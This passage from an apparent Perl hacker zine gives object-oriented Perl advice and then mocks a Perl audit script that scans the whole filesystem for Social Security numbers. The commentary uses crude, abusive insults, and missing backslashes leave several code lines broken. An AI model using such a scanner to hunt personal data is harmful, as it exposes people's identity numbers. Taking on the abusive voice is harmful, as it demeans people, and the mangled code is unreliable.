crop up when you let people reach into the object. One of the major points of OO programming is to allow proper encapsulation of what's going on inside of the object. As soon as you let your defensive programming guard down, you're going to get bug reports. Use proper methods to handle this: $object->foo; $object->set_foo($foo); Don't expose state if you don't have to. if ($object->error) { $object->log_errors } # bad! Whoops! Now we have a problem. Not only does every place in the code that might want to log errors have to first check if those errors exist, your log_errors method might erroneously assume that this has been checked. Check the state inside of the method. sub log_errors { my $self = shift; return $self unless $self->error; $self->_log_errors; } Better yet, there's a good chance that you're not concerned about the error log at runtime, so you could simply specify an error log in your constructor (or have the class use a default log), and let the module handle all of that internally. sub connect { my $self = shift; unless ($self->_get_rss_feed) { $self->_log_errors; $self->_fetch_cached_copy; } $self; } In the above example, there's an error that should be noted, but since a cached copy of data is acceptable, there's no need for the program to deal with this directly. The object notes the problem internally, adopts a fallback remedy and everything is peachy. Keep your data structures uniform (I saw this on use.perl but I can't remember who posted it) Assuming that a corresponding mutator exists, accessors should return a data structure that the mutators will accept. The following must always work: $object->set_foo( $object->get_foo ); Failure to do this will cause no end of grief for programmers who assume that that the object accepts the data structures that it emits. Debugging $object->as_string Create a method (be cautious about overloading string conversions for this) to dump the state of an object. Many simply use YAML or Data::Dumper, but having a nice, human readable format can mean a world of difference when trying to debug a problem. Here's the YAML dump of a hypothetical product. Remember that, amongst other things, YAML is supposed to be human-readable. --- #YAML:1.0 !perl/Product bin: 19 data: category: 7 cost: 2.13 name: Shirt price: 3.13 id: 7 inv: 22 modified: 0 Now here's hypothetical as_string() output that might be used in debugging (though you might want to tailor the method for public display). Product 7 Name: Shirt Category: Clothing (7) Cost: $2.13 Price: $3.13 On-hand: 22 Bin: Aisle 3, Shelf 5b (19) Record not modified That's easier to read and, by doing lookups on the category and bin ids, you can present output that's easier to understand. Test I've saved the best for last for a good reason. Write a full set of tests! One of the nicest things about tests is that you can ask someone to run them if they submit a bug report. Failing that, it's a perfect way to ensure that a bug does not return, that your objects behave as documented and that you don't have ``extra features'' that you weren't expecting. One of the strongest objections to OO perl is the idiomatic object constructor: sub new { my ($class, %data) = @_; bless /%data => $class; } Which can then be followed with: sub set_some_property { my ($self, $property) = @_; $self->{some_prorety} = $property; # (sic) return $self; } sub some_property { $_[0]->{some_property} } And the tests: ok($object->set_some_property($foo), 'Setting a property should succeed'); is($object->some_property, $foo, "... and fetching it should also succeed"); Because blessing a hash reference is the most common method of creating objects in Perl, we lose many of the benefits of strict. However, a proper test suite will catch issues like this and ensure that they don't recur. On a personal note, I've noticed that since I've begun testing, I sometimes forget to use strict, but my code has not been suffering for it. In fact, sometimes it's better because I frequently write code for which strict would be a hassle, but that's another example of where the rules get broken, but they're broken because the programmer knows when to break them. Yet another fascinating thing about tests is the freedom they give you. If you have a comprehensive test suite, you can start taking liberties with your code in a way that you haven't before. Are you having performance problems because you're using an accessor in the bottom of a nested loop? If the object is a blessed hashref, you might get quite a performance boost by just ``reaching inside'' and grabbing the data you need directly. While many will tell you this is a no-no, the reason they mention this is for maintainability. However, a good test suite will protect you against many of the maintainability problems you may face (though it still won't make fixing your encapsulation violations any easier once you are bitten). That last paragraph might sound a bit curious. Is Ovid really telling people it's OK to violate encapsulation, particularly after he pointed out the evils of it? Yes, I am saying that. I'm not recommending that, but one thing that often gets lost in the shuffle when ``paradigm'' flame wars begin is that programming is a series of compromises. Rare indeed is the programmer who has claimed that she's never compromised the integrity of her code for performance, cost, or deadline pressures. We want to have a perfect system that people will ``ooh'' and ``aah'' over, but when you see the boss coming down the hall with a worried look, you realize that the latest nasty hack is going to make its way into production. Tests, therefore, are your friend. Tests will tell you if the nasty little hack works. Tests will tell you when the nasty little hack breaks. Test, damn you! CONCLUSION Many Perl programmers, including myself, learned Perl's OO syntax without knowing much about object-oriented programming. It's worth picking up a book or two and doing some reading about OO theory and pick up some of the tricks that, upon reflection, seem so obvious. Let the object do the work for you. Hide its internals carefully and don't force the programmer to worry about the object's state. All of the guidelines above can be broken, but knowing about them and why you want to follow them will tell you when it's OK to break them. Update: I really should have called this "Often Overlooked Object Oriented Observations". Then we could refer to this node as "'O'x5". Cheers, Ovid -[0x18] # TS/SCI Security, 'cause we need more bullshit ------------------ #!/usr/bin/perl use strict; use File::Find; # Kickass spacing there. And you forgot to enable warnings. # Get date and open log my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time); # Wow... my $date = sprintf("%4d-%02d-%02d", $year+1900, $mon+1, $mday); # ... my $logname = sprintf("audit-%4d%02d%02d.log", $year+1900, $mon+1, $mday); my $logdir = '~/log/'; my $time = sprintf("%02d:%02d:%02d", $hour, $min, $sec); # This is looking alot like C. # sprintf has its uses, but this was unnecessary. my $datetime = "$date $time"; # Why did you bother creating $date and $time to being with? Extra scalars. # You know that all your little formatting stuff is lame, right? # Why not just use the localtime as it's returned? # At least you did localtime(time) though. That's something. open (LOG, ">>$logdir/$logname") || die; # REAAALLL slick... print LOG "/nDATE: $datetimen"; # Yea, that came typo'ed like that. # Find all files under this directory find(/&handleFind, '/'); sub handleFind { # Again, great spacing. my $foundFile = $File::Find::name; return unless ($foundFile =~ //.(csv|doc|pdf|rtf|txt|xls)?$/i); # Parens look goofy man. print "SEARCHING: $foundFile/n"; open(FILE, "$foundFile"); # Way to quote the scalar there buddy. my $found = 0; # Great code design there. # Our guess is that you meant while (<FILE>) but just were too fucking lame to notice # that you lost at the internet. And yes, we did "view source" to be sure ;[ while () { # Search documents for SSN's if (/([0-9]{3}-[0-9]{2}-[0-9]{4})/) { # Ah, the implicitness... $found = $1; next; } } print LOG "FOUND: $foundFile/n" if $found; # At least you know one-line if()'s } print "/nSearch completed. Wrote to file: $logdir$logname"; # No "/n" or / ? # Thank god it's over at least. # BTW, whitespace is your _FRIEND_! Learn to use it! # TS/SCI security is a good example of some jerkoffs who want to put themselves somewhere in the blog # scene but don't have any content to back them up. So they say "let's put up four or five really # shitty scripts, in different languages, to show those blog-reading bitches that we've got skillz, # but we're going to be too lame to actually get it right or notice the mistakes, and nobody will read # our shit anyways so it's all good" # Good thing we have talented people to poke fun at, otherwise we'd rip apart every fucking piece of # code you penisgrabbers had up there. -[0x19] # Shoutz and Outz ------------------------------------------------ That's all, folks. Thanks for coming out. Thanks to the people who helped out, and to everyone who waited patiently. Shouts to everyone using Perl 5.10 already. ___ _ _ _ _ ___ _ | _ | | | | | | | | | | | | | _|_ ___| | | | |___ _| |___ ___| _|___ ___ _ _ ___ _| | | | -_| _| | | | | | . | -_| _| | | _| . | | | | . | |_|___|_| |_| |___|_|_|___|___|_| |___|_| |___|___|_|_|___| Forever Abigail $_ = "/x3C/x3C/x45/x4F/x46/n" and s/<<EOF/<<EOF/ee and print; "Just another Perl Hacker," EOF